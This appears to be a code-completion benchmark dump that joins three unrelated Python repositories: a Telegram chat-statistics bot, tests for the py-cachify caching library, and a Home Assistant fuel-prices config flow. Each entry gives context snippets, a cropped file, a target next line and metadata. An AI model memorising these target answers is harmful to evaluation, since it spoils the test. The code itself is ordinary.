ascending=False)\n\n # Select the top 10 users\n top_10_users = user_stats.head(10)\n\n # Plot the bar chart\n plt.bar(top_10_users[\"user_id\"], top_10_users[\"attachment_count\"])\n plt.xlabel(\"User ID\")\n plt.ylabel(\"Attachment Count\")\n plt.title(f\"Top 10 Users by Attachment Count in {update.effective_chat.title}\")\n plt.legend()\n buf = io.BytesIO()\n plt.savefig(buf, format=\"png\")\n buf.seek(0)\n await msg.delete()\n await context.bot.send_photo(\n chat_id=update.effective_chat.id,\n photo=buf,\n reply_to_message_id=msg.reply_to_message.message_id,\n )"
},
{
"identifier": "plot_table",
"path": "stats_bot/handlers/plot.py",
"snippet": "@admin\nasync def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Generates a table of top 10 users by number of messages and average message length,\n and plots a bar chart to visualize the data.\n\n Args:\n update (Update): The update object containing information about the incoming message.\n context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.\n\n Returns:\n None\n \"\"\"\n msg = await update.effective_message.reply_text(\"Generating table...\")\n data = []\n\n # fetch this data from database\n with Session(engine) as session:\n # users = session.exec(select(User)).all()\n messages = session.exec(\n select(Message).where(Message.group_id == update.effective_chat.id)\n ).all()\n # make a list of users, messages of whom are in the messages variable\n users = []\n for message in messages:\n if message.user_id not in users:\n users.append(message.user_id)\n # print(users)\n for user in users:\n usr = session.exec(select(User).where(User.id == user)).first()\n msgs = session.exec(\n select(Message.text).where(Message.user_id == usr.id)\n ).all()\n data.append((usr.username or str(usr.id), msgs))\n # Convert data to a pandas DataFrame\n df = pd.DataFrame(data, columns=[\"user_id\", \"messages\"])\n\n print(df)\n\n df[\"num_messages\"] = df[\"messages\"].apply(len)\n\n # Calculate average message length per user\n df[\"avg_message_length\"] = df[\"messages\"].apply(\n lambda x: sum(len(message) for message in x) / len(x)\n )\n\n # Sort users by number of messages and average message length\n df = df.sort_values(by=[\"num_messages\", \"avg_message_length\"], ascending=False)\n\n # Plot top 10 users\n top_10_users = df.head(10)\n plt.figure(figsize=(10, 6))\n plt.bar(\n top_10_users[\"user_id\"],\n top_10_users[\"num_messages\"],\n color=\"blue\",\n alpha=0.6,\n label=\"Number of Messages\",\n )\n plt.xlabel(\"User ID\")\n plt.ylabel(\"Number of Messages\")\n plt.title(\n f\"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length\"\n )\n plt.legend()\n buf = io.BytesIO()\n plt.savefig(buf, format=\"png\")\n buf.seek(0)\n await msg.delete()\n await context.bot.send_photo(\n chat_id=update.effective_chat.id,\n photo=buf,\n reply_to_message_id=msg.reply_to_message.message_id,\n )"
}
] | from telegram.ext import (
ApplicationBuilder,
CommandHandler,
MessageHandler,
filters,
)
from stats_bot.handlers.start import start
from stats_bot.handlers.group import handle_update
from stats_bot.handlers.plot import attachment_stats, plot_table
import logging, configparser
import stats_bot.db.client as client | 1,855 |
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logging.getLogger(__name__)
configparser = configparser.ConfigParser()
configparser.read("config.ini")
app = (
ApplicationBuilder().token(configparser.get("stats_bot", "token")).build()
)
app.add_handler(CommandHandler("start", start, filters=filters.ChatType.PRIVATE))
|
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logging.getLogger(__name__)
configparser = configparser.ConfigParser()
configparser.read("config.ini")
app = (
ApplicationBuilder().token(configparser.get("stats_bot", "token")).build()
)
app.add_handler(CommandHandler("start", start, filters=filters.ChatType.PRIVATE)) | app.add_handler(CommandHandler("attachmentstats", attachment_stats, filters=filters.ChatType.GROUPS)) | 2 | 2023-12-18 03:05:36+00:00 | 4k |
EzyGang/py-cachify | tests/test_backend.py | [
{
"identifier": "AsyncWrapper",
"path": "py_cachify/backend/clients.py",
"snippet": "class AsyncWrapper:\n def __init__(self, cache: MemoryCache) -> None:\n self._cache = cache\n\n async def get(self, name: str, default: Any = None) -> Any:\n return self._cache.get(name=name, default=default)\n\n async def delete(self, *names: str) -> Any:\n self._cache.delete(*names)\n\n async def set(self, name: str, value: Any, ex: Union[int, None] = None) -> Any:\n self._cache.set(name=name, value=value, ex=ex)"
},
{
"identifier": "MemoryCache",
"path": "py_cachify/backend/clients.py",
"snippet": "class MemoryCache:\n def __init__(self) -> None:\n self._cache: Dict[str, Tuple[Any, Union[float, None]]] = {}\n\n def set(self, name: str, value: Any, ex: Union[int, None] = None) -> None:\n self._cache[name] = value, ex and time.time() + ex\n\n def get(self, name: str, default: Any = None) -> Any:\n val, exp_at = self._cache.get(name, (default, None))\n\n if not exp_at or exp_at > time.time():\n return val\n\n self.delete(name)\n return default\n\n def delete(self, *names: str) -> None:\n for key in names:\n if key not in self._cache:\n continue\n\n del self._cache[key]"
},
{
"identifier": "CachifyInitError",
"path": "py_cachify/backend/exceptions.py",
"snippet": "class CachifyInitError(Exception):\n pass"
},
{
"identifier": "Cachify",
"path": "py_cachify/backend/lib.py",
"snippet": "class Cachify:\n def __init__(\n self, sync_client: Union[SyncClient, MemoryCache], async_client: Union[AsyncClient, AsyncWrapper], prefix: str\n ) -> None:\n self._sync_client = sync_client\n self._async_client = async_client\n self._prefix = prefix\n\n def set(self, key: str, val: Any, ttl: Union[int, None] = None) -> Any:\n self._sync_client.set(name=f'{self._prefix}{key}', value=pickle.dumps(val), ex=ttl)\n\n def get(self, key: str) -> Any:\n return (val := self._sync_client.get(name=f'{self._prefix}{key}')) and pickle.loads(val)\n\n def delete(self, key: str) -> Any:\n return self._sync_client.delete(f'{self._prefix}{key}')\n\n async def a_get(self, key: str) -> Any:\n return (val := await self._async_client.get(name=f'{self._prefix}{key}')) and pickle.loads(val)\n\n async def a_set(self, key: str, val: Any, ttl: Union[int, None] = None) -> Any:\n await self._async_client.set(name=f'{self._prefix}{key}', value=pickle.dumps(val), ex=ttl)\n\n async def a_delete(self, key: str) -> Any:\n return await self._async_client.delete(f'{self._prefix}{key}')"
},
{
"identifier": "get_cachify",
"path": "py_cachify/backend/lib.py",
"snippet": "def get_cachify() -> Cachify:\n global _cachify\n if _cachify is None:\n raise CachifyInitError('Cachify is not initialized, did you forget to call `init_cachify`?')\n\n return _cachify"
}
] | import time
import pytest
import py_cachify.backend.lib
from pytest_mock import MockerFixture
from py_cachify.backend.clients import AsyncWrapper, MemoryCache
from py_cachify.backend.exceptions import CachifyInitError
from py_cachify.backend.lib import Cachify, get_cachify | 1,777 | @pytest.fixture
def async_wrapper(memory_cache):
return AsyncWrapper(memory_cache)
@pytest.fixture
def cachify(memory_cache, async_wrapper):
return Cachify(sync_client=memory_cache, async_client=async_wrapper, prefix='_PYC_')
def test_memory_cache_set_and_get(memory_cache):
memory_cache.set('key', 'value', ex=10)
assert memory_cache.get('key') == 'value'
def test_memory_cache_set_and_get_with_expiry(memory_cache):
memory_cache.set('key', 'value', ex=-1)
assert memory_cache.get('key') is None
def test_memory_cache_get_with_default(memory_cache):
assert memory_cache.get('nonexistent_key', default='default_value') == 'default_value'
def test_memory_cache_delete(memory_cache):
memory_cache.set('key', 'value')
memory_cache.delete('key')
assert memory_cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_get(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value', ex=10)
result = await async_wrapper.get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_async_wrapper_get_with_default(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
result = await async_wrapper.get('nonexistent_key', default='default_value')
assert result == 'default_value'
@pytest.mark.asyncio
async def test_async_wrapper_delete(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value')
await async_wrapper.delete('key', 'nonexistent_key')
assert async_wrapper._cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_set(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
await async_wrapper.set('key', 'value', ex=10)
assert async_wrapper._cache.get('key') == 'value'
def test_cachify_set_and_get(cachify):
cachify.set('key', 'value', ttl=10)
assert cachify.get('key') == 'value'
def test_cachify_set_and_get_with_ttl(cachify):
cachify.set('key', 'value', ttl=-1)
assert cachify.get('key') is None
def test_cachify_get_with_nonexistent_key(cachify):
assert cachify.get('nonexistent_key') is None
def test_cachify_get(cachify):
cachify.set('key', 'value')
result = cachify.get('key')
assert result == 'value'
def test_cachify_delete(cachify):
cachify.set('key', 'value')
cachify.delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_get(cachify):
cachify.set('key', 'value')
result = await cachify.a_get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_cachify_a_get_with_nonexistent_key(cachify):
result = await cachify.a_get('nonexistent_key')
assert result is None
@pytest.mark.asyncio
async def test_cachify_a_delete(cachify):
cachify.set('key', 'value')
await cachify.a_delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_set(cachify):
await cachify.a_set('key', 'value')
assert cachify.get('key') == 'value'
def test_init_cachify(init_cachify_fixture):
assert py_cachify.backend.lib._cachify is not None
def test_get_cachify_raises_error():
with pytest.raises(CachifyInitError, match='Cachify is not initialized, did you forget to call `init_cachify`?'):
|
@pytest.fixture
def memory_cache():
return MemoryCache()
@pytest.fixture
def async_wrapper(memory_cache):
return AsyncWrapper(memory_cache)
@pytest.fixture
def cachify(memory_cache, async_wrapper):
return Cachify(sync_client=memory_cache, async_client=async_wrapper, prefix='_PYC_')
def test_memory_cache_set_and_get(memory_cache):
memory_cache.set('key', 'value', ex=10)
assert memory_cache.get('key') == 'value'
def test_memory_cache_set_and_get_with_expiry(memory_cache):
memory_cache.set('key', 'value', ex=-1)
assert memory_cache.get('key') is None
def test_memory_cache_get_with_default(memory_cache):
assert memory_cache.get('nonexistent_key', default='default_value') == 'default_value'
def test_memory_cache_delete(memory_cache):
memory_cache.set('key', 'value')
memory_cache.delete('key')
assert memory_cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_get(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value', ex=10)
result = await async_wrapper.get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_async_wrapper_get_with_default(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
result = await async_wrapper.get('nonexistent_key', default='default_value')
assert result == 'default_value'
@pytest.mark.asyncio
async def test_async_wrapper_delete(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
async_wrapper._cache.set('key', 'value')
await async_wrapper.delete('key', 'nonexistent_key')
assert async_wrapper._cache.get('key') is None
@pytest.mark.asyncio
async def test_async_wrapper_set(async_wrapper, mocker: MockerFixture):
mocker.patch.object(time, 'time', return_value=0)
await async_wrapper.set('key', 'value', ex=10)
assert async_wrapper._cache.get('key') == 'value'
def test_cachify_set_and_get(cachify):
cachify.set('key', 'value', ttl=10)
assert cachify.get('key') == 'value'
def test_cachify_set_and_get_with_ttl(cachify):
cachify.set('key', 'value', ttl=-1)
assert cachify.get('key') is None
def test_cachify_get_with_nonexistent_key(cachify):
assert cachify.get('nonexistent_key') is None
def test_cachify_get(cachify):
cachify.set('key', 'value')
result = cachify.get('key')
assert result == 'value'
def test_cachify_delete(cachify):
cachify.set('key', 'value')
cachify.delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_get(cachify):
cachify.set('key', 'value')
result = await cachify.a_get('key')
assert result == 'value'
@pytest.mark.asyncio
async def test_cachify_a_get_with_nonexistent_key(cachify):
result = await cachify.a_get('nonexistent_key')
assert result is None
@pytest.mark.asyncio
async def test_cachify_a_delete(cachify):
cachify.set('key', 'value')
await cachify.a_delete('key')
assert cachify.get('key') is None
@pytest.mark.asyncio
async def test_cachify_a_set(cachify):
await cachify.a_set('key', 'value')
assert cachify.get('key') == 'value'
def test_init_cachify(init_cachify_fixture):
assert py_cachify.backend.lib._cachify is not None
def test_get_cachify_raises_error():
with pytest.raises(CachifyInitError, match='Cachify is not initialized, did you forget to call `init_cachify`?'): | get_cachify() | 4 | 2023-12-16 22:54:51+00:00 | 4k |
lldacing/comfyui-easyapi-nodes | easyapi/ImageNode.py | [
{
"identifier": "tensor_to_pil",
"path": "easyapi/util.py",
"snippet": "def tensor_to_pil(image):\n return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8))"
},
{
"identifier": "pil_to_tensor",
"path": "easyapi/util.py",
"snippet": "def pil_to_tensor(image):\n return torch.from_numpy(np.array(image).astype(np.float32) / 255.0).unsqueeze(0)"
},
{
"identifier": "base64_to_image",
"path": "easyapi/util.py",
"snippet": "def base64_to_image(base64_string):\n # 去除前缀\n base64_list = base64_string.split(\",\", 1)\n if len(base64_list) == 2:\n prefix, base64_data = base64_list\n else:\n base64_data = base64_list[0]\n\n # 从base64字符串中解码图像数据\n image_data = base64.b64decode(base64_data)\n\n # 创建一个内存流对象\n image_stream = io.BytesIO(image_data)\n\n # 使用PIL的Image模块打开图像数据\n image = Image.open(image_stream)\n\n return image"
},
{
"identifier": "image_to_base64",
"path": "easyapi/util.py",
"snippet": "def image_to_base64(pli_image, pnginfo=None):\n # 创建一个BytesIO对象,用于临时存储图像数据\n image_data = io.BytesIO()\n\n # 将图像保存到BytesIO对象中,格式为PNG\n pli_image.save(image_data, format='PNG', pnginfo=pnginfo)\n\n # 将BytesIO对象的内容转换为字节串\n image_data_bytes = image_data.getvalue()\n\n # 将图像数据编码为Base64字符串\n encoded_image = \"data:image/png;base64,\" + base64.b64encode(image_data_bytes).decode('utf-8')\n\n return encoded_image"
},
{
"identifier": "read_image_from_url",
"path": "easyapi/util.py",
"snippet": "def read_image_from_url(image_url):\n response = requests.get(image_url)\n img = Image.open(io.BytesIO(response.content))\n return img"
}
] | import base64
import copy
import io
import numpy as np
import torch
import json
from PIL import ImageOps, Image
from nodes import LoadImage
from comfy.cli_args import args
from PIL.PngImagePlugin import PngInfo
from json import JSONEncoder, JSONDecoder
from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url
| 1,786 | """
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = np.array(image).astype(np.float32) / 255.0
image = torch.from_numpy(image)[None, ]
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
images.append(image)
masks.append(mask.unsqueeze(0))
return (images, masks,)
class ImageToBase64Advanced:
def __init__(self):
self.imageType = "image"
@classmethod
def INPUT_TYPES(self):
return {"required": {
"images": ("IMAGE",),
"imageType": (["image", "mask"], {"default": "image"}),
},
"hidden": {"prompt": "PROMPT", "extra_pnginfo": "EXTRA_PNGINFO"},
}
RETURN_TYPES = ("STRING",)
RETURN_NAMES = ("base64Images",)
FUNCTION = "convert"
# 作为输出节点,返回数据格式是{"ui": {output_name:value}, "result": (value,)}
# ui中是websocket返回给前端的内容,result是py执行传给下个节点用的
OUTPUT_NODE = True
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
# OUTPUT_IS_LIST = (False,False,)
def convert(self, images, imageType=None, prompt=None, extra_pnginfo=None):
if imageType is None:
imageType = self.imageType
result = list()
for i in images:
|
class LoadImageFromURL:
"""
从远程地址读取图片
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
从远程地址读取图片
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = np.array(image).astype(np.float32) / 255.0
image = torch.from_numpy(image)[None, ]
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
images.append(image)
masks.append(mask.unsqueeze(0))
return (images, masks,)
class ImageToBase64Advanced:
def __init__(self):
self.imageType = "image"
@classmethod
def INPUT_TYPES(self):
return {"required": {
"images": ("IMAGE",),
"imageType": (["image", "mask"], {"default": "image"}),
},
"hidden": {"prompt": "PROMPT", "extra_pnginfo": "EXTRA_PNGINFO"},
}
RETURN_TYPES = ("STRING",)
RETURN_NAMES = ("base64Images",)
FUNCTION = "convert"
# 作为输出节点,返回数据格式是{"ui": {output_name:value}, "result": (value,)}
# ui中是websocket返回给前端的内容,result是py执行传给下个节点用的
OUTPUT_NODE = True
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
# OUTPUT_IS_LIST = (False,False,)
def convert(self, images, imageType=None, prompt=None, extra_pnginfo=None):
if imageType is None:
imageType = self.imageType
result = list()
for i in images:
| img = tensor_to_pil(i)
| 0 | 2023-12-19 02:32:10+00:00 | 4k |
pantherale0/ha-fuelprices | custom_components/fuel_prices/config_flow.py | [
{
"identifier": "DOMAIN",
"path": "custom_components/fuel_prices/const.py",
"snippet": "DOMAIN = \"fuel_prices\""
},
{
"identifier": "NAME",
"path": "custom_components/fuel_prices/const.py",
"snippet": "NAME = \"Fuel Prices\""
},
{
"identifier": "CONF_AREAS",
"path": "custom_components/fuel_prices/const.py",
"snippet": "CONF_AREAS = \"areas\""
},
{
"identifier": "CONF_SOURCES",
"path": "custom_components/fuel_prices/const.py",
"snippet": "CONF_SOURCES = \"sources\""
}
] | import logging
import voluptuous as vol
from typing import Any
from homeassistant.config_entries import ConfigEntry, OptionsFlow
from pyfuelprices.sources.mapping import SOURCE_MAP, COUNTRY_MAP
from homeassistant import config_entries
from homeassistant.data_entry_flow import FlowResult
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import selector
from homeassistant.helpers import config_validation as cv
from homeassistant.core import callback
from homeassistant.const import (
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_NAME,
CONF_TIMEOUT,
CONF_SCAN_INTERVAL,
)
from .const import DOMAIN, NAME, CONF_AREAS, CONF_SOURCES | 2,065 | CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_create", data_schema=AREA_SCHEMA, errors=errors
)
async def async_step_area_update_select(
self, user_input: dict[str, Any] | None = None
):
"""Show a menu to allow the user to select what option to update."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if self.configured_areas[i]["name"] == user_input[CONF_NAME]:
self.configuring_area = data
self.configuring_index = i
break
return await self.async_step_area_update()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_update_select",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_area_update(self, user_input: dict[str, Any] | None = None):
"""Handle an area update."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.pop(self.configuring_index)
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_update",
data_schema=vol.Schema(
{
vol.Required(
CONF_NAME, default=self.configuring_area[CONF_NAME]
): selector.TextSelector(),
vol.Required(
CONF_RADIUS, default=self.configuring_area[CONF_RADIUS]
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LATITUDE],
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LONGITUDE],
): cv.longitude,
}
),
errors=errors,
)
async def async_step_area_delete(self, user_input: dict[str, Any] | None = None):
"""Delete a configured area."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if data["name"] == user_input[CONF_NAME]:
self.configured_areas.pop(i)
break
return await self.async_step_area_menu()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_delete",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_finished(self, user_input: dict[str, Any] | None = None):
"""Save configuration."""
errors: dict[str, str] = {}
if user_input is not None:
if len(self.configured_sources) > 0:
user_input[CONF_SOURCES] = self.configured_sources
elif self.hass.config.country is not None:
user_input[CONF_SOURCES] = COUNTRY_MAP.get(self.hass.config.country)
else:
user_input[CONF_SOURCES] = list(SOURCE_MAP)
| """Config flow for Fuel Prices."""
_LOGGER = logging.getLogger(__name__)
AREA_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): selector.TextSelector(),
vol.Required(CONF_RADIUS, default=5.0): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE, "coordinates", "Latitude and longitude must exist together"
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE, "coordinates", "Latitude and longitude must exist together"
): cv.longitude,
}
)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow."""
VERSION = 1
configured_areas: list[dict] = []
configured_sources = []
configuring_area = {}
configuring_index = -1
timeout = None
interval = None
@property
def configured_area_names(self) -> list[str]:
"""Return a list of area names."""
items = []
for area in self.configured_areas:
items.append(area["name"])
return items
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle the intial step."""
# only one config entry allowed
# users should use the options flow to adjust areas and sources.
await self.async_set_unique_id(NAME)
self._abort_if_unique_id_configured()
self.configured_areas = []
self.configured_sources = []
self.configuring_area = {}
self.configuring_index = -1
self.timeout = 10
self.interval = 1440
# add the home location as a default (this can optionally be removed).
self.configured_areas.append(
{
CONF_NAME: self.hass.config.location_name,
CONF_LATITUDE: self.hass.config.latitude,
CONF_LONGITUDE: self.hass.config.longitude,
CONF_RADIUS: 10.0,
}
)
return await self.async_step_main_menu()
async def async_step_main_menu(self, _: None = None):
"""Display configuration menu."""
return self.async_show_menu(
step_id="main_menu",
menu_options={
"area_menu": "Configure areas to create devices/sensors",
"sources": "Configure data collector sources",
"finished": "Complete setup",
},
)
async def async_step_sources(self, user_input: dict[str, Any] | None = None):
"""Set data source config."""
if user_input is not None:
self.configured_sources = user_input[CONF_SOURCES]
return await self.async_step_main_menu(None)
return self.async_show_form(
step_id="sources",
data_schema=vol.Schema(
{
vol.Optional(
CONF_SOURCES, default=self.configured_sources
): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.DROPDOWN,
options=list(SOURCE_MAP),
multiple=True,
)
),
vol.Optional(
CONF_TIMEOUT,
default=self.timeout,
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
min=5,
max=60,
unit_of_measurement="s",
)
),
vol.Optional(
CONF_SCAN_INTERVAL,
default=self.interval,
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
min=120,
max=1440,
unit_of_measurement="m",
)
),
}
),
)
async def async_step_area_menu(self, _: None = None) -> FlowResult:
"""Show the area menu."""
return self.async_show_menu(
step_id="area_menu",
menu_options={
"area_create": "Define a new area",
"area_update_select": "Update an area",
"area_delete": "Delete an area",
"main_menu": "Return to main menu",
},
)
async def async_step_area_create(self, user_input: dict[str, Any] | None = None):
"""Handle an area configuration."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_create", data_schema=AREA_SCHEMA, errors=errors
)
async def async_step_area_update_select(
self, user_input: dict[str, Any] | None = None
):
"""Show a menu to allow the user to select what option to update."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if self.configured_areas[i]["name"] == user_input[CONF_NAME]:
self.configuring_area = data
self.configuring_index = i
break
return await self.async_step_area_update()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_update_select",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_area_update(self, user_input: dict[str, Any] | None = None):
"""Handle an area update."""
errors: dict[str, str] = {}
if user_input is not None:
self.configured_areas.pop(self.configuring_index)
self.configured_areas.append(
{
CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_update",
data_schema=vol.Schema(
{
vol.Required(
CONF_NAME, default=self.configuring_area[CONF_NAME]
): selector.TextSelector(),
vol.Required(
CONF_RADIUS, default=self.configuring_area[CONF_RADIUS]
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
